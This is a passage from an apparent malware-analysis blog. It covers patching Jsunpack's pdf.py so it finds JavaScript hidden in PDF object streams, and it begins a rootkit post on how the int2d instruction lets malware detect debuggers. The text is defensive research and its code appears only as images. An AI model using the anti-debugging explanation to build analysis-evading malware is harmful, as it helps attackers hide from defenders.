understand the syntax we can refer to PDF Document Reference [3], however, it
is clear after some simple analysis. As we can see from <i>Figure 1.5</i> we have four objects listed consecutively. The first
number is the object number and the second is the offset to the beginning of
the next stream. So the first two numbers “13 0” declares the object 13 is
contained first at offset 0. The next two numbers “14 22” is object 14 and the
content for that object is at offset 22. The same for the next two pairs “15 49”
and “16 146”. If we look back at the output of pdf.py we see the tags for
object 10 and which tag allows for multiple objects.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEietgw2CVq4BVs1XuC-L9GYIiEVnDpkdqgJ_GaNCQB_1WU4n7j4BlyofHDNXtm00J675JrghAoj7cQUOCrLCjTxdIoEHmKOq7hAgDwteWK2-ut9DwpUkgcHTcFtMYsGmJ01j4bRvhqL-DMd/s1600/Figure+1-6.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEietgw2CVq4BVs1XuC-L9GYIiEVnDpkdqgJ_GaNCQB_1WU4n7j4BlyofHDNXtm00J675JrghAoj7cQUOCrLCjTxdIoEHmKOq7hAgDwteWK2-ut9DwpUkgcHTcFtMYsGmJ01j4bRvhqL-DMd/s640/Figure+1-6.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.6 - <i>Snippet from the output of pdf.py for notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We
see that the tag “/ObjStm” allows for multiple objects to be embedded into
object 10 and we can confirm by looking at the PDF Document Reference [3]. Also
the tag “/N” informs us of how many objects are included inside object 10 and
as we can see in <i>Figure 1.6,</i> and is
verified by pdfstreamdumper, the number of objects inside object 10 is 4. </span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
same process above can be followed to determine where the missing objects 5 and
6, from the pdf.py output, are located. Object 5 is embedded in Object 2.
Object 6 is embedded into object 3. </span><i style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Figure
1.7</i><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"> and </span><i style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Figure 1.8</i><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"> show the
contents of objects 2 and 6 respectively using pdfstreamdumper.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikBHXobsgg1A2agSJwPM5uYxlxsHc95mtf2UjSkDUPg-mTRDrQ2sWNBcYIz442sI2C5xRHnc0dsFelEYhbGYk9dVVJAnOLNJgjzw8DGWsbDloI53BLNWp28jRbuANBJyNqTX1_o8XhsnBt/s1600/Figure+1-7.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikBHXobsgg1A2agSJwPM5uYxlxsHc95mtf2UjSkDUPg-mTRDrQ2sWNBcYIz442sI2C5xRHnc0dsFelEYhbGYk9dVVJAnOLNJgjzw8DGWsbDloI53BLNWp28jRbuANBJyNqTX1_o8XhsnBt/s640/Figure+1-7.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.7 - <i>Contents of object 2 shown in Pdfstreamdumper for the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY9VuyZDRkmx32aik4E63dAhfmEczkLeN-nUNRTEIAkwTJJf7CNSXkG7UcxznUXEC1CwwSkWKV4QPsLGg2VezWxcHXzxGTqt0_Uujld60srHrEpJW1RBo-t_kg_aj7WUGc0kYRHs3QJfC7/s1600/Figure+1-8.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY9VuyZDRkmx32aik4E63dAhfmEczkLeN-nUNRTEIAkwTJJf7CNSXkG7UcxznUXEC1CwwSkWKV4QPsLGg2VezWxcHXzxGTqt0_Uujld60srHrEpJW1RBo-t_kg_aj7WUGc0kYRHs3QJfC7/s640/Figure+1-8.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.8 - <i>Contents of object 3 shown in Pdfstreamdumper for the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
locations of the missing objects are known and this information can be used to
figure out why the pdf.py script does not detect the JavaScript in the “notwork.pdf”
document. The python debugger is utilized to step through the “pdf.py” functions
and determine how each object is parsed, specifically object 10. This article
assumes the reader knows how to use the python debugger and does not go into
detail on the debugging process.</span><br />
<br />
<span style="font-size: large;"><b>4. Results and Solution</b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
results of the debugging session are the following. The python script “pdf.py”
does not handle the “ObjStm” tag. Any object with a tag “/ObjStm” has a stream
that is decompressed, if necessary, however, the information in the stream is
not parsed by “pdf.py”. So what we can do here is inject code into pdf.py to
handle the “/ObjStm” tag. <i>Figure 1.9 </i>is the code I wrote that detects if an object
has a “/ObjStm” tag. Also it checks each object inside and determines if there exist
JavaScript.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XeqvJgMAUdyJOIXxFaElTibACLZ2d-spEBuz-3qsPWgPaLSgvy3txWq3vyPzyB2qTp9xI_kLJTjK2PwotS7_Ntxqau7AJGHzQ2AaZkefsqGH06BLzbE8YhaKGsamcYyIy_-MhNYPr_F1/s1600/Figure+1-9.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XeqvJgMAUdyJOIXxFaElTibACLZ2d-spEBuz-3qsPWgPaLSgvy3txWq3vyPzyB2qTp9xI_kLJTjK2PwotS7_Ntxqau7AJGHzQ2AaZkefsqGH06BLzbE8YhaKGsamcYyIy_-MhNYPr_F1/s640/Figure+1-9.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.9 - <i>Code created for pdf.py to address objects streams in a PDF document</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">This
code has also been submitted to Jsunpack’s source code and the patch request is pending review. <i>Figure 1.9</i> displays the new output for “notwork.pdf”
when executed with the modified “pdf.py” script which includes the code shown
above.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6K36Ojx7YRqRN5W6iduM7wHNWnBEihxMoJOdYOo0JpvkyG4zQBoRyWNrIIVW8THtsnyrG3HRoGqxfNzZuR6xU7ocqG5ZslcthyphenhyphenPBBDf3f-7UtE8bWQd6pfIPeGwKWNM8q1eQXXqwEif_/s1600/Figure+1-11.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="608" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6K36Ojx7YRqRN5W6iduM7wHNWnBEihxMoJOdYOo0JpvkyG4zQBoRyWNrIIVW8THtsnyrG3HRoGqxfNzZuR6xU7ocqG5ZslcthyphenhyphenPBBDf3f-7UtE8bWQd6pfIPeGwKWNM8q1eQXXqwEif_/s640/Figure+1-11.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmnbZKYMj2Y34anBjGum3XyP-9IKSQ8PQM5AZtHKsn0yNTrtZ-ZQckXloig8IY8u-B6vbPZ8bIOPPYfHhUqx5RfbNckqzTx_65KA7rXArQIzZJ8YJzjg3D8QIY56ADr0LdVmZc3xMQZsie/s1600/Figure+1-11_2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="608" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmnbZKYMj2Y34anBjGum3XyP-9IKSQ8PQM5AZtHKsn0yNTrtZ-ZQckXloig8IY8u-B6vbPZ8bIOPPYfHhUqx5RfbNckqzTx_65KA7rXArQIzZJ8YJzjg3D8QIY56ADr0LdVmZc3xMQZsie/s640/Figure+1-11_2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqkHqM0ictdvtaThG8RBebzn_ECDdFek6qt3pcvLT7hIy5RHPDkVXKfVBVKCEWgJNqYzeugN_yE6DchM3PK-o2zFn53KhCxXklWNnnqbusBaGW62jmb9f65L9KOAJeBW8Nu2f5SI7Rr5lj/s1600/Figure+1-11_3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="610" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqkHqM0ictdvtaThG8RBebzn_ECDdFek6qt3pcvLT7hIy5RHPDkVXKfVBVKCEWgJNqYzeugN_yE6DchM3PK-o2zFn53KhCxXklWNnnqbusBaGW62jmb9f65L9KOAJeBW8Nu2f5SI7Rr5lj/s640/Figure+1-11_3.PNG" width="640" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjokGShQg8UqRHFIogoI3Oq3q-jmrLb_3vY5dxvUNnpSRwvhJbetYwHZ1VhWaTvFJ7OzsqGynbeoQMio3qNtAIs-fDg1dRI9C1X4VRQalAvRBwetLhNA2yyORnaFMN8PyGTCa6W02lbQDWZ/s1600/Figure+1-11_4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjokGShQg8UqRHFIogoI3Oq3q-jmrLb_3vY5dxvUNnpSRwvhJbetYwHZ1VhWaTvFJ7OzsqGynbeoQMio3qNtAIs-fDg1dRI9C1X4VRQalAvRBwetLhNA2yyORnaFMN8PyGTCa6W02lbQDWZ/s640/Figure+1-11_4.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.10 - <i>Output of modified pdf.py executed with the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">As
we can see in<i> Figure 1.10</i> the python script detects the JavaScript! The objects 13-16
and 5-6 were missing from the unmodified version. Our modification makes those
objects visible in the output as well as outputs the JavaScript functions to a separate
file. In the example above the JavaScript is exported to a file named “notwork.pdf.out”.
Overall this solution improves upon the pdf.py script and allows it to handle
objects in an object stream. More importantly it detects if JavaScript exist
inside an object stream.</span><br />
<br />
<span style="font-size: large;"><b>5. Additional Patch to Pdf.py </b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Another
patch that has been made to the pdf.py script is in regards to the “/Names”
tag. I noticed that if the “/Names” tag includes a custom name with the tag
then the parsing only captures the text of the name and not the reference
number. An example is shown below.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G6NJbwdr1pwgZ6Pb3IoooSG_S_o4QUkOR1Slb9Ee_wEIOHYtPRCHs8KzTsvWZZYq-rd69AnX80B0hBglTQROOwsuuMpU1HXRrIEya5exKnejyCzKYCYkYBksgNwbwRW1kAdBOPIIBxaa/s1600/Figure+1-12.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G6NJbwdr1pwgZ6Pb3IoooSG_S_o4QUkOR1Slb9Ee_wEIOHYtPRCHs8KzTsvWZZYq-rd69AnX80B0hBglTQROOwsuuMpU1HXRrIEya5exKnejyCzKYCYkYBksgNwbwRW1kAdBOPIIBxaa/s640/Figure+1-12.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.11 - <i>Snippet of the output from pdf.py for the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">For
object 14 there is a “/Name” tag and the output only display the text “My Code”
which is the name given to the reference to object 15. However, the reference
to object 15 does not appear. After utilizing the python debugger to trace into
the program, the issue is due to the parenthesis which stops the parsing
function from capturing anything after the parenthesis. This is easily fixed by
adding a condition to an existing “if” statement in “pdf.py”. The change is displayed in <i>Figure 1.12</i>.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFlxEwdPwe40zH84z-NoOy4pgSN5Wm6T2xEzj4iMo_IhfHfuPYT8L7kwQToTTrqk0zXJzIMSFpSBT1gY0Kz_rptIlULoCJSBBSGIz_NcQcgpNZ7jdsKWI1cRn4ljmgBwpUMieXjx41J9-U/s1600/Figure+1-10.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFlxEwdPwe40zH84z-NoOy4pgSN5Wm6T2xEzj4iMo_IhfHfuPYT8L7kwQToTTrqk0zXJzIMSFpSBT1gY0Kz_rptIlULoCJSBBSGIz_NcQcgpNZ7jdsKWI1cRn4ljmgBwpUMieXjx41J9-U/s640/Figure+1-10.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.12 - <i>Code created for pdf.py to address the missing reference number for the tag "/Names" </i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
tag variable is an array that contains the stream for the current object. So as well as looking for
the condition “\\”, I added the condition “curtag == ‘Names’ “. This line now
checks if the current tag is a “/Name” tag and if it is the parsing function
will continue to collect the following characters in the tag which would
include the object reference number.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk09n2kMOrYDgdrqSdEawhNdpbXljgB5ICj7q1SUqooQKsj6CF2QV7ozJm331Cucx91SvwoKKTV6qBtg9ip_ZZMaAvDugitr027LwyUIajGSeiaMArkrZ7Scp9PIpUHsbwcYlQgdWOVmcR/s1600/Figure+1-13.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk09n2kMOrYDgdrqSdEawhNdpbXljgB5ICj7q1SUqooQKsj6CF2QV7ozJm331Cucx91SvwoKKTV6qBtg9ip_ZZMaAvDugitr027LwyUIajGSeiaMArkrZ7Scp9PIpUHsbwcYlQgdWOVmcR/s640/Figure+1-13.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.13 - <i>Snippet of output from the modified pdf.py for the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"><i>Figure
1.13</i> shows the new output of the modified “pdf.py” script which includes the
reference as well as the text name which is given to the tag “/Names”.</span><br />
<br />
<span style="font-size: large;"><b>6. References</b></span><br />
[1] Jsunpack, Available at <a href="http://code.google.com/p/jsunpack-n/">http://code.google.com/p/jsunpack-n/</a><br />
[2] Pdfstreamdumper, Available at <a href="http://sandsprite.com/blogs/index.php?uid=7&pid=57">http://sandsprite.com/blogs/index.php?uid=7&pid=57</a><br />
[3] Pdf Document Reference, Available at <a href="http://www.adobe.com/devnet/pdf/pdf_reference.html">http://www.adobe.com/devnet/pdf/pdf_reference.html</a>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-8501561183307667545.post-61998551368196715562012-03-20T00:00:00.000-07:002012-04-09T20:38:22.360-07:00ZeroAccess Rootkit - Part 2<b><span style="font-size: large;">1. Debuggers</span></b><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Debugging an application means to detect and remove bugs from an application. Debuggers are essential in software programming because they can help quickly identify a syntactic or logic error in a program. In the field of malware analysis, debuggers are used to study how malicious codes work in order to provide a method of detection and removal. Debuggers are also used by software pirates who reverse engineer popular software to find ways to remove protections put in place by the application developers. Due to the emergence of software pirates and their utilization of debuggers, developers use anti-debugging techniques to serve as a deterrence to those individuals who reverse engineer their code. There is no complete solution to stop a reverse engineer who is committed, however, anti-debugging techniques makes the process more difficult, requires a higher level of expertise to bypass, and increases the time for analysis of an application [2].Similar to application developers, who utilize anti-debugging techniques to serve as a layer of protection for their software, malware authors also adopt these techniques for the malware they create. In this scenario debugging techniques serve as a deterrence to malware analysts. The purpose is to prevent accurate analysis of the malicious code by the malware analysts and in effect increase the lifespan of the malware.</span></div>
<br />
<span style="font-size: large;"><b>2. Dynamic Behavior of Int2d</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Many anti-debugging techniques exist; however, this section concentrates on the Int2d instruction since it is frequently used in the Max++ rootkit. The int2d interrupt is a special interrupt reserved for Microsoft kernel debugging service. It raises an exception to be handled by the kernel debugger. If the kernel debugger does not handle the exception it is then passed to the user level exception handling. When an interrupt 2d is executed, the memory address of the exception points to the EIP register. The EIP register is the instruction pointer and always points to the next instruction. After the exception address has been set to the EIP register, the EIP is incremented by one byte. An exception breakpoint is issued and the exception is either handled or not handled by an exception handler. When no debugger is attached to the system, execution will resume at the address of the exception. The execution will resume normally because the exception is assumed to be corrected and the process can continue from the exception address. If a debugger is present, the execution of the program will continue at the EIP </span><span style="font-family: Calibri, sans-serif; line-height: 115%;">address which is one byte after the exception address. The program skips one byte and this is known as a byte scission.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Due to the difference in observed behavior of the int2d instruction, this can be used to determine if a debugger is present on the system. Also since one byte is skipped, this instruction can be used to change the execution of programs based on the debugging environment. A program may run differently if a debugger is attached to the system as opposed to if no debugger is attached. This technique proves problematic for malware analysis.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">This section also explores the dynamic nature of the int2d instruction. The complexities of int2d are more than meets the eye and the factors that change its behavior are numerous. Some examples of factors that can change the observed behavior of the int2d instruction are the values of the register, the structured exception handling, whether a user level debugger is present, as well as whether a kernel level debugger is attached. Different behaviors can be observed by combinations of the above examples. An experimental approach is followed to examine the change in behavior exhibited by int2d.</span></div>
<br />
<span style="font-size: large;"><b>3. Int2d Experiment Design</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">To analyze the int2d instruction, the C program in Figure 2.2 is utilized. Written by Dr. Xiang Fu [1], the Int2dExp.cc program is used in this paper to perform experiments with the int2d instruction. The file is compiled into a binary executable to later debug. The program consists of two print statements. The first print statement displays the characters “AAAA”. The second print statement displays the characters “BBBB”. Variables are also included in the code to give room to insert assembly instructions in a debugger. Immunity debugger allows us to debug the executable and modify the assembly instructions.</span></div>
<div style="text-align: justify;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5I9YuJ6YBtlYbhUNLYiOpGguP_keiE5k-TyP2Pn3wrsz95EiAhccoxQ-bPPzYcYfFX_1b2aZNN4egVeZ1tA3YHnNPBVJfXoPxXQZRpN9Q7Fcs6QoueUa0BAtzgarsqa6JUKztGiww0y4F/s1600/Figure+2-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5I9YuJ6YBtlYbhUNLYiOpGguP_keiE5k-TyP2Pn3wrsz95EiAhccoxQ-bPPzYcYfFX_1b2aZNN4egVeZ1tA3YHnNPBVJfXoPxXQZRpN9Q7Fcs6QoueUa0BAtzgarsqa6JUKztGiww0y4F/s1600/Figure+2-2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.2 – <i>C code for Int2dExp.cc</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Figure 2.3 shows the int2dexp binary file opened in Immunity debugger. The important section of the assembly instructions are shown below. From the memory address “004010DA” to “004010EF, the variables “a” through “d” are initialized. The next two lines stores the value “AAAA” and display it by calling the “printf” function from the “cygwin.dll” file at address “004010FD”. The second print statement is located at address “00401125” and displays the characters “BBBB”.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_0upPHJuk7gCgK4RVjtfJv28s07aegI8BG3u6Cbe5BJK6WKjYqOSb0xCuPxqAynxySLzOpzBdYnT6DAQ9aiFccmd9DCsDcpB993c42KaC_rbuNJkfTKIa1mc9IJO6G4Omga6AAMFIBJ_h/s1600/Figure+2-3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_0upPHJuk7gCgK4RVjtfJv28s07aegI8BG3u6Cbe5BJK6WKjYqOSb0xCuPxqAynxySLzOpzBdYnT6DAQ9aiFccmd9DCsDcpB993c42KaC_rbuNJkfTKIa1mc9IJO6G4Omga6AAMFIBJ_h/s640/Figure+2-3.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.3 – <i>Assembly</i> <i>instructions shown in Immunity debugger for int2dexp executable</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The instructions are modified to incorporate the use of the int2d instruction. In order to test the different behaviors we set up an int2d instruction and overwrite the previous initialization of variables. The int2d is followed by a one byte instruction which is “INC”. To test if the byte after int2d is skipped we include a “CMP” and “JE” instruction. “CMP” compares two values and sets the Z flag in the debugger. The instruction compare subtracts the two values from each other and if they are equal then the result is zero. When the result is zero the “Z flag”, which stands for “zero flag”, will be set to one. If the two values in the compare instruction are not equal the z flag is set to zero. The “JE” instruction stand for “jump if equal to zero” and it depends on the “z flag”. If the two values in the compare function are equal, then the z flag is set to 1 and the “JE” is true and results in a jump to the address specified. The “JE” instruction allows us to see if int2d causes a byte scission. Figure 2.4 shows the modified int2dexp with the EAX register set to one. If a byte is skipped then the “INC EAX” instruction will not be executed. The EAX register retains the same value and at the instruction “CMP” the two values remain equal. The jump instruction is true and the execution would jump from the address “0040110D” to “0040112A”. The jump address is right after the second print statement and prevents the characters “BBBB” from being displayed. Figure 2.4 only displays the character “AAAA”.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM6myiWCKLgYl-YLy16bftjEo0B8Uhyphenhyphen6N_OwDTcZPUiw353sqkPT4zmUiDvSGkenVj0hWw3u9FCkGw0Q1W6xvBGvJTv6g_P4eFjaGB6pIBHdyGOVXi6mBKUWn2CEIuJmpl7kuby-hj-ZX/s1600/Figure+2-4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM6myiWCKLgYl-YLy16bftjEo0B8Uhyphenhyphen6N_OwDTcZPUiw353sqkPT4zmUiDvSGkenVj0hWw3u9FCkGw0Q1W6xvBGvJTv6g_P4eFjaGB6pIBHdyGOVXi6mBKUWn2CEIuJmpl7kuby-hj-ZX/s640/Figure+2-4.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.4 - <i>Assembly instructions in Immunity debugger for int2dexp where EAX equals one and the JE is included</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Another way to accomplish the same experiment above is to replace the instruction “JE” with the instruction “JNZ”. “JNZ” stand for jump if not equal to zero and does the exact opposite of the “JE” instruction. If two values in the compare function are not equal to each other than the JNZ instruction will jump to a specified address. For the same example above if we replace JE with JNZ the program would display “AAAABBBB” instead of only “AAAA”. “JNZ” example can be seen in Figure 2.5.</span></div>
<div style="text-align: justify;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJZ2gLq-R-wW0rK-3CqFc7Al1K2VJ5snMlWXc-9-bzUKXACwYp7axt2G0RLm97c4v-KQH8NPE0cDY9W1T_wJ2QEI_qBmw2zz2xkb4TvUu2f5npCy_uoN4cUrYa9SiVisf3183S2UuFPAZe/s1600/Figure+2-5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJZ2gLq-R-wW0rK-3CqFc7Al1K2VJ5snMlWXc-9-bzUKXACwYp7axt2G0RLm97c4v-KQH8NPE0cDY9W1T_wJ2QEI_qBmw2zz2xkb4TvUu2f5npCy_uoN4cUrYa9SiVisf3183S2UuFPAZe/s640/Figure+2-5.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.5 – Assembly instructions in Immunity debugger for int2dexp where EAX equals one and JNZ is included</span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The program above allows us to test the int2d behavior against two factors. First the debugging environment is changed. The execution is examined with a user level debugger attached, a kernel level debugger attached, and with no debugger attached. The second factor that is changed is the value of the EAX register. The EAX register can be easily modified by changing the value at address “00401102”. Figure 2.6 shows an example where the EAX register is changed to the value two.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRMjYFmNSZqoLp40aHkNhI3GThMACB-VBVEOyonz9HejQTbbAiqbB44bMgjS18P4Bcf0lSOqac_WGnJu-AxPm97hx-nh1yPFyKLg3KtAdzqp_bo4_W9x75VbVQwmmXPuHTmwPTCplcg3Lw/s1600/Figure+2-6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRMjYFmNSZqoLp40aHkNhI3GThMACB-VBVEOyonz9HejQTbbAiqbB44bMgjS18P4Bcf0lSOqac_WGnJu-AxPm97hx-nh1yPFyKLg3KtAdzqp_bo4_W9x75VbVQwmmXPuHTmwPTCplcg3Lw/s640/Figure+2-6.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.6 - Assembly instructions in Immunity debugger for int2dexp where EAX equals two and JE is included</span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><b>4. Int2d Experiment Configuration</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">A virtual box image of Windows XP SP2 was used as a host system. The guest system was Windows 7 Home Edition with debugger tools installed on both systems. Below is the serial port configuration for the host system.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
